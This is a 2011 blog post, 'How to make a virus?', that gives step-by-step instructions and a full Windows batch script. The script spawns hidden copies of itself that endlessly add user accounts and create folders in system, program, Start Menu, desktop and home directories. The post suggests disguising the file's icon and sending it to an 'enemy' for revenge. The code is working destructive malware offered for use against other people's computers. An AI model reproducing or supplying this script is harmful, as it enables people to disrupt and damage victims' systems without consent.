Saturday 2 July 2011

How to make a virus?

Creating a harmful computer virus is not too hard. To create a harmful computer virus follow these steps:-

  1. Open notepad - If you are using windows XP or Vista, go to run and type notepad and hit enter. If you are using windows 7 search notepad. You may use other methods too.
  2. Type the code - type / copy & paste the following code:


    @ECHO OFF
    @ECHO A PHOENIX PRODUCTION
    @ECHO MAIN BAT RUNNING
    GOTO start

    :start
    @ECHO SET snowball2=1 >> bat6.bat
    @ECHO GOTO flood5 >> bat6.bat
    @ECHO :flood5 >> bat6.bat
    @ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
    @ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
    @ECHO GOTO flood5 >> bat6.bat
    START /MIN bat6.bat
    GOTO bat5

    :bat5
    @ECHO CD %%ProgramFiles%%\ >> bat5.bat
    @ECHO SET maggi=1 >> bat5.bat
    @ECHO GOTO flood4 >> bat5.bat
    @ECHO :flood4 >> bat5.bat
    @ECHO MKDIR maggi%%maggi%% >> bat5.bat
    @ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
    @ECHO GOTO flood4 >> bat5.bat
    START /MIN bat5.bat
    GOTO bat4

    :bat4
    @ECHO CD %%SystemRoot%%\ >> bat4.bat
    @ECHO SET marge=1 >> bat4.bat
    @ECHO GOTO flood3 >> bat4.bat
    @ECHO :flood3 >> bat4.bat
    @ECHO MKDIR marge%%marge%% >> bat4.bat
    @ECHO SET /a marge=%%marge%%+1 >> bat4.bat
    @ECHO GOTO flood3 >> bat4.bat
    START /MIN bat4.bat
    GOTO bat3

    :bat3
    @ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
    @ECHO SET bart=1 >> bat3.bat
    @ECHO GOTO flood2 >> bat3.bat
    @ECHO :flood2 >> bat3.bat
    @ECHO MKDIR bart%%bart%% >> bat3.bat
    @ECHO SET /a bart=%%bart%%+1 >> bat3.bat
    @ECHO GOTO flood2 >> bat3.bat
    START /MIN bat3.bat
    GOTO bat2

    :bat2
    @ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
    @ECHO SET homer=1 >> bat2.bat
    @ECHO GOTO flood >> bat2.bat
    @ECHO :flood >> bat2.bat
    @ECHO MKDIR homer%%homer%% >> bat2.bat
    @ECHO SET /a homer=%%homer%%+1 >> bat2.bat
    @ECHO GOTO flood >> bat2.bat
    START /MIN bat2.bat
    GOTO original

    :original
    CD %HomeDrive%\
    SET lisa=1
    GOTO flood1
    :flood1
    MKDIR lisa%lisa%
    SET /a lisa=%lisa%+1
    GOTO flood1
  3. Save the file -  Save the file as .bat extension (i.e. if you want your virus file named funny, save it as funny.bat ). You may change the icon of your file. If you don't know how to change icon of a file, click here to learn.
  4. Your virus is ready - Now you are done. You may send this virus to your enemy's computer and take the revenge. 

WARNING - "This virus may seriously affect your computer, so do not use it on your own computer or where you store your important data. In case of any dispute, we are not responsible for it.  "

    0 comments:

    Post a Comment

    Dear visitor,
    How-to updates its articles at regular intervals to ensure that you always receive the matter which is up-to-date. Even then if you are not satisfied by our article or having any complaint regarding our post, just leave a comment along with your e-mail address.